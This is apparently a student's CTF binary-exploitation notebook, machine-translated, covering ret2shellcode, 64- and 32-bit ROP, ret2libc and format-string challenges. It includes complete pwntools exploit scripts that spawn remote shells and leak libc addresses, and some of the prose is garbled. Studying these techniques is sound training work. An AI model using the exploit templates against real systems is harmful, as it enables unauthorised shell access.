1.ret2shellcode
Quote ciscn_ 2019_ n_ five
Open the main function and find that get is still a stack overflow, but shift has no bin and system, and no protection is turned on. When a name variable is opened, it is found to exist on the bss side. Therefore, you want to write the name directly to shellcode, and adjust get to the name function
from pwn import* r=remote('node4.buuoj.cn',26540) context(arch='amd64',os='linux') shellcode=asm(shellcraft.sh()) r.sendlineafter('tell me your name',shellcode) payload=b'a'*0x28+p64(0x601080) r.sendlineafter('What do you want to say to me?',payload) r.interactive()
2.rop chain construction
Quote [HarekazeCTF2019]baby_rop
Open the main function and find that there is a stack overflow condition in scanf. Find bin and system in shift, and then use gadget to find pop rdi ret to construct rop
But it's strange that ls has all but can't cat flag. I don't understand
In the 64 bit rop construction, the parameters are first transferred before calling the function, and the first six parameters are first transferred into the registers rdi,rsi, rdx, rcx, r8d and r9d. Before entering the stack, try to find the address of pop register ret in the static library before construction. Generally speaking, the order of construction is: garbage filling + pop register (the first six parameters are directly transferred later) + calling the function address
The 32-bit rop structure is also similar, but the parameters are directly passed into the stack first, and the parameter transfer methods are different. Specifically, the function is called first, and then the parameters are passed in. The understanding is simpler than that of 64 bit. The construction logic is: garbage filling + calling function address + parameter filling
3.ret2libc
a. Triathlon (Fifth Division)_ 2018_rop 1
Open the main function, the classic nx protection, no sys and bin, and think of using the leaked address, direct template format, 32-bit template
from pwn import * from LibcSearcher import * r=remote('00 ',00) elf=ELF('./2018_rop') write_plt=elf.plt['write'] write_got=elf.got['write'] main=elf.sym['main'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(0)+p32(write_got)+p32(4) r.sendline(payload) write_addr=u32(r.recv(4)) libc=LibcSearcher('write',write_addr) offset=write_addr-libc.dump('write') system_addr=offset+libc.dump('system') bin_sh=offset+libc.dump('str_bin_sh') payload='a'*(0x88+4)+p32(system_addr)+p32(0)+p32(bin_sh) r.sendline(payload) r.interactive()
b.
[HarekazeCTF2019]baby_rop2
Very angry, github can't open libc at all so. 6 can't, so I can only see the specific method of disassembly. The same idea as a is changed to 64 bits. It is worth noting that calling printf function calls% s function
from pwn import * from LibcSearcher import * context.log_level = 'debug' #p = process('./babyrop2') p = remote('00',00) elf = ELF('babyrop2') pop_rdi = 0x0000000000400733 pop_rsi_r15 = 0x0000000000400731 format_str = 0x0000000000400770 ret_addr = 0x0000000000400734 printf_plt = elf.plt['printf'] read_got = elf.got['read'] main_plt = elf.sym['main'] payload = 'a'*0x28+p64(pop_rdi)+p64(format_str)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_plt) p.recvuntil("name? ") p.sendline(payload) read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) print hex(read_addr) libc = LibcSearcher('read', read_addr) libc_base = read_addr - libc.dump('read') sys_addr = libc_base + libc.dump('system') bin_sh = libc_base + libc.dump('str_bin_sh') payload = 'a'*0x28+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr) p.sendline(payload) p.interactive()
4. Format string
pwn2_sctf_2016
read a printf and the same variable is a formatted string
First gdb debug aaaa, mark the price casually, print it in%08x, and find 11 distances
from pwn import * p=remote('node4.buuoj.cn',29607) addr=0x0804a02c payload=p32(addr)+b'%11$n' p.sendline(payload) p.interactive()
0x0804a02c four bytes. When input to the address of x=3, it can only be changed to 4
Another type seems to have% s directly leaking flag Txt
Miscellaneous notes
A.buuctf ciscn_2019_ne_5: The parameter of system can be binsh or sh
B.bjdctf_2020_babystack2
Due to the strong setting of overflow size, the discussion of unsigned and signed integers increases the input range
C/C + +: integer overflow_ Lee's blog CSDN blog_ Integer Overflow thank
C. Virtual bombed many times. There are many plug-ins that can't be installed. I'm so angry. I found a problem with the installation of the virtual machine hard disk on the Internet. I want to laugh. Just try one yourself.
GitHub - Joe1sn/one_shot_pwn: one click deployment pwn basic configuration
It's a little unexpected to see joesn, but it can't be installed
GitHub - skyedai910/PWN_VM_SETUP: PWN virtual machine configuration script cowhide
However, the environment of python2 is always not good. It's very annoying. I'm ready to do it again at the beginning of school
D. Four protection mechanisms Explanation of four protection mechanisms of NX, Canary, relro, pie and Linux_ Peninsula iron box blog - CSDN blog_ Relro protection
E.jarvisoj_tell_me_something
Some topics do not need to be compiled. If there is no leave, there is no need to fill in ebp